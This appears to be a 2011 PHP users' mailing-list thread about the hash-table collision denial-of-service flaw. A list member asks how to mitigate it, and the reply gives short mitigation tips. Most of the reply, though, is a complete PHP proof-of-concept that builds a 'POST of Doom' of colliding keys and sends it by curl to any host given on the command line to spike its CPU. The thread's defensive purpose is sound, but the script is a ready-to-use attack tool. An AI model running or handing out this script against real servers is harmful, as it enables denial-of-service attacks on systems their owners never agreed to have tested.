[nycphp-talk] Hash Table Vulnerability in PHP5
Ben Sgro
ben at projectskyline.com
Thu Dec 29 11:33:20 EST 2011
Hey,
Don't allow posts w/> ~100 k/v pairs. Don't allow larger uploads then is necessary. As you mentioned, I guess limit script execution time.
Right now, there's some snort signatures going around (Not sure if you run IDS, etc). I've also heard people mention a mod_rewrite regex
to strip out these bads chars.
I have a PoC here you can test against your servers: (And here also: http://koto.github.com/blog-kotowicz-net-examples/hashcollision/kill.html)
<?php
// v--- ripped from: https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
//
// generate POST of Doom
function doom() {
// entries with collisions in PHP hashtable hash function
$a = array(
'0' => 'Ez',
'1' => 'FY',
'2' => 'G8',
'3' => 'H' . chr(23),
'4' => 'D'.chr(122+33),
);
// how long should the payload be
$length = 7;
$size = count($a);
$post = '';
$max = pow($size,$length);
for ($i = 0; $i < $max; $i++) {
$s = str_pad(base_convert($i, 10, $size), $length, '0', STR_PAD_LEFT);
$post .= '' . (urlencode(strtr($s, $a))) . '=&';
}
return $post;
}
// hashcollider.php
// by sk
$post = doom();
$ch = curl_init();
$args = getopt("h:");
$host = $args['h'];
curl_setopt($ch, CURLOPT_URL, $host);
curl_setopt($ch, CURLOPT_POST, 1 );
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
printf("[x] Target: %s\n", $host);
printf("[x] CPU spike!\n");
$result=curl_exec ($ch);
printf("[x] Payload sent.\n");
Good luck!
- Ben
On Dec 29, 2011, at 11:19 AM, Hans C. Kaspersetz wrote:
> Good morning,
>
> I hope everyone has seen the news about the Hash Table Vulnerability in lots of web scripting languages. You can read about it here: http://www.securityweek.com/hash-table-collision-attacks-could-trigger-ddos-massive-scale or here http://www.kb.cert.org/vuls/id/903934.
>
> It looks like PHP has addressed the issue (http://www.php.net/archive/2011.php#id2011-12-25-1) by providing a max var directive in the latest RC5 for 5.4.0. However, with all release candidates they are strongly advising against using it in production.
>
> What is the general consensus for mitigating this risk without moving to RC5?
>
> We are limiting the execution time of our scripts, however for upload scripts or processing intensive scripts we need to increase the execution time which I image would leave those scripts more vulnerable.
>
> Thanks,
> Hans Kaspersetz
> Cyber X Designs
> http://cyberxdesigns.com
>
> _______________________________________________
> New York PHP Users Group Community Talk Mailing List
> http://lists.nyphp.org/mailman/listinfo/talk
>
> http://www.nyphp.org/Show-Participation
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.nyphp.org/pipermail/talk/attachments/20111229/da75ef9a/attachment.html>
More information about the talk
mailing list